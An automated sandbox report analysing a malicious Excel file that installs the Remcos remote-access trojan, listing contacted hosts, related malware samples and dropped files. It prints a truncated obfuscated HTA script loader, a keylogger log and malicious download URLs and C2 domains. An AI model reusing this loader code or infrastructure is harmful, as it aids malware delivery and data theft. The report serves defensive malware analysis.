                                                                                                                                                                                                		7941INTERNET-ARCHIVEUStrue
                                                                                                                                                                                                178.237.33.50
                                                                                                                                                                                                		geoplugin.netNetherlands
                                                                                                                                                                                                		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                                192.3.220.40
                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                		36352AS-COLOCROSSINGUStrue

                                                                                                                                                                                                General Information

                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                Analysis ID:1529026
                                                                                                                                                                                                Start date and time:2024-10-08 15:22:11 +02:00
                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                Overall analysis duration:0h 12m 29s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                                Number of analysed new started processes analysed:33
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Sample name:QPS-36477.xls
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/45@8/6
                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                • Successful, ratio: 77.8%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                                                • Number of executed functions: 185
                                                                                                                                                                                                • Number of non-executed functions: 325
                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                                                                • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                                                • Active ActiveX Object
                                                                                                                                                                                                • Active ActiveX Object
                                                                                                                                                                                                • Scroll down
                                                                                                                                                                                                • Close Viewer
                                                                                                                                                                                                • Override analysis time to 68125.6515850551 for current running targets taking high CPU consumption
                                                                                                                                                                                                • Override analysis time to 136251.30317011 for current running targets taking high CPU consumption

                                                                                                                                                                                                Warnings

                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                                                                • Execution Graph export aborted for target mshta.exe, PID 2988 because there are no executed function
                                                                                                                                                                                                • Execution Graph export aborted for target mshta.exe, PID 3764 because there are no executed function
                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                • VT rate limit hit for: QPS-36477.xls

                                                                                                                                                                                                Simulations

                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                09:23:40API Interceptor110x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                09:23:44API Interceptor621x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                09:23:52API Interceptor33x Sleep call for process: wscript.exe modified
                                                                                                                                                                                                09:24:01API Interceptor4952983x Sleep call for process: RegAsm.exe modified

                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                IPs

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                135.148.195.248DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                  PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                    gwfe4fo1Sp.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.22755.22546.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                        SecuriteInfo.com.Trojan-Downloader.Office.Doc.20731.18439.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.3511.17688.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                            QPS366349.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.20492.1802.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    188.114.97.3scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • paste.ee/d/gvOd3
                                                                                                                                                                                                                    IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.bayarcepat19.click/yuvr/
                                                                                                                                                                                                                    Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.cc101.pro/0r21/
                                                                                                                                                                                                                    http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                                                                                                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                                                                                                                                                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                    • filetransfer.io/data-package/MlZtCPkK/download
                                                                                                                                                                                                                    https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • mairie-espondeilhan.com/
                                                                                                                                                                                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                    • filetransfer.io/data-package/758bYd86/download
                                                                                                                                                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • filetransfer.io/data-package/58PSl7si/download
                                                                                                                                                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • filetransfer.io/data-package/58PSl7si/download

                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    idabo.duckdns.orgDHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 135.148.195.248
                                                                                                                                                                                                                    PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 135.148.195.248
                                                                                                                                                                                                                    geoplugin.netzYJYK66EGb.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    1728373206596a852cdbe7ae697de423fbd80cabe33d7a6a584032b72164b61e0692c12d1a849.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    SecuriteInfo.com.FileRepMalware.12793.28433.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                                                    ia600102.us.archive.orgordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242

                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    AVAYAUSna.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 135.122.218.20
                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 135.169.255.101
                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 135.151.183.219
                                                                                                                                                                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 135.71.97.111
                                                                                                                                                                                                                    2UngC9fiGa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                    • 135.73.117.220
                                                                                                                                                                                                                    0wG3Y7nLHa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                    • 135.76.170.61
                                                                                                                                                                                                                    Jr77pnmOup.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 198.152.87.15
                                                                                                                                                                                                                    ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 135.56.234.115
                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                    • 135.96.222.68
                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                    • 135.83.183.48
                                                                                                                                                                                                                    CLOUDFLARENETUSUpdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                    • 104.26.1.231
                                                                                                                                                                                                                    Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    osjCeEFNrF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                    LYqMgahOY0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                                    Iw7mPc6fCG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 104.26.12.205
                                                                                                                                                                                                                    UyvVIyj7Ga.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.136.232
                                                                                                                                                                                                                    Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                    • 104.21.53.8
                                                                                                                                                                                                                    INTERNET-ARCHIVEUSordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    Wg3tf5MIzS.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    9gTW6ik1Z1.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    lcvKxaEBA3.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    vt4hGZq9md.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    2Efe8RQhvR.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.240
                                                                                                                                                                                                                    CLOUDFLARENETUSUpdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                    • 104.26.1.231
                                                                                                                                                                                                                    Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    osjCeEFNrF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                    LYqMgahOY0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                                    Iw7mPc6fCG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 104.26.12.205
                                                                                                                                                                                                                    UyvVIyj7Ga.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.136.232
                                                                                                                                                                                                                    Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                    • 104.21.53.8

                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    05af1f5ca1b87cc9cc9b25185115607dordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 207.241.227.242
                                                                                                                                                                                                                    7dcce5b76c8b17472d024758970a406bordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                    • 188.114.96.3

                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                    C:\ProgramData\remcos\logs.dat

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):384
                                                                                                                                                                                                                    Entropy (8bit):3.621581422343861
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:6lJ8wc5YcIeeDAlkY0ovTM4ywZ90ySNosb3fxNa/WAv:6lJ2ecj0l4v7Q350/W+
                                                                                                                                                                                                                    MD5:4A87E5701E4F6415624680855792B5DC
                                                                                                                                                                                                                    SHA1:ABA1147A055BCD1F11092BD53BC4877723D9E43C
                                                                                                                                                                                                                    SHA-256:482512C6DCE88A94767786E44EA589050256E1469CFCA9191C0B27D62C5EA124
                                                                                                                                                                                                                    SHA-512:3451B19DDB398E8FDA854DCFC1684B7E1E38305A6E4A155A7E78BD20804D780B186612B9EC70E292599305912E459799A3AC2A1DC9C24D2704294F29B849F4EE
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                                    Preview:....[.2.0.2.4./.1.0./.0.8. .0.9.:.2.4.:.0.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.h.t.t.p.s.:././.w.r.a.t.h...m.e./.E.h.Y.y.k.L.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .Q.P.S.-.3.6.4.7.7. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].....[.C.t.r.l.L.].....[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):15189
                                                                                                                                                                                                                    Entropy (8bit):5.0343247648743
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:+WciDaVjvowSVOdBzVoGIpN6KQkj2/RWSJiQ0HzAFC:+WJaVjvowSVOdBzV3IpNBQkj2/RWSJid
                                                                                                                                                                                                                    MD5:ED1DC217B7C4FD47161AE1BE8E57C288
                                                                                                                                                                                                                    SHA1:018D8DF5F1C16D39D84F2BE8401727F9594EF530
                                                                                                                                                                                                                    SHA-256:7F93D4BD3BCA78ECDBC61EA0FF4C50214B3AA8879D39B6793E9E4B512D9614DB
                                                                                                                                                                                                                    SHA-512:CA8D3B5E3A35998A72DFE5C766197FC52856DC535C15117146150177A3CA97F0B13F6DABDEC9B050C871D7AE7CDC08F501690F079CC054ACBBB4AFF2B8659977
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:PSMODULECACHE.........7...y...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1........Get-WinEvent........New-WinEvent........Import-Counter........Export-Counter........Get-Counter.........*.a...._...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1........Invoke-TroubleshootingPack........Get-TroubleshootingPack................Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Remove-BitsTransfer........Get-BitsTransfer........Suspend-BitsTransfer........Complete-BitsTransfer........Resume-BitsTransfer........Start-BitsTransfer........Add-BitsFile........Set-BitsTransfer........j.].7...M...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1........nwsn........New-PSWorkflowExecutionOption........New-PSWorkflowSession..........Q.8...w...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.Powe

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:@...e...........................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newthingtobeonlinefor[1].hta

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):120801
                                                                                                                                                                                                                    Entropy (8bit):2.548131261547014
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:Ea+M7+XoPsV9oPpF/4Ow5qouNREOX8MlV5BYoPItl8AT:Ea+Q+XoPsPoPX/4J54E3cqoPi9T
                                                                                                                                                                                                                    MD5:02DB2924D9D28415909466FD83D98BFB
                                                                                                                                                                                                                    SHA1:131F37687D5F92227DBF8DB85537D8D588BA4C67
                                                                                                                                                                                                                    SHA-256:63460BD959DB60A47DE9DFBC64C58ABD983AF187B29D7732987928C56A83A2E1
                                                                                                                                                                                                                    SHA-512:7B7BEC8C6F697B048D87E2AF22E704CAF7A2C05FDB1331E99D13D5BAF0F5C625CF574D16C596D2DBB000B829BDB752437801C8BB833ED7E62DD1AE3F4C14D9F5
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CsCrIpt%252520tyPe%25253D%252522tExT/VbSCRiPt%252522%25253E%25250AdiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verybestthingswesharedfornew[1].tiff

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):195560
                                                                                                                                                                                                                    Entropy (8bit):3.7210597034966684
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3072:kXvVPVWplSFblsHb6LBgt5poGwNqmM5pfir3RkQ5Pxl5Ax3pTgROVnjRv:qVPVWpy5sHGXqj2Z5Luh9eOVjRv
                                                                                                                                                                                                                    MD5:FFA76C6571F4F3D4E5E256586A8390B6
                                                                                                                                                                                                                    SHA1:00854060B1673D298068AAF9248129EFE750EB93
                                                                                                                                                                                                                    SHA-256:9E97607E9FB8CA4C56D9754B0A6D3FCD24B9816DC62DE63BE73869B17E5E8B24
                                                                                                                                                                                                                    SHA-512:ADC073AEE0AA3C6C7F6BF08606D616BF64F7ECBFA9A095361185DF8D041998505D044306AF933482F11DC6D5D484154954CB315AC8E767DAD19094F9BDDB2C2A
                                                                                                                                                                                                                    Malicious:false
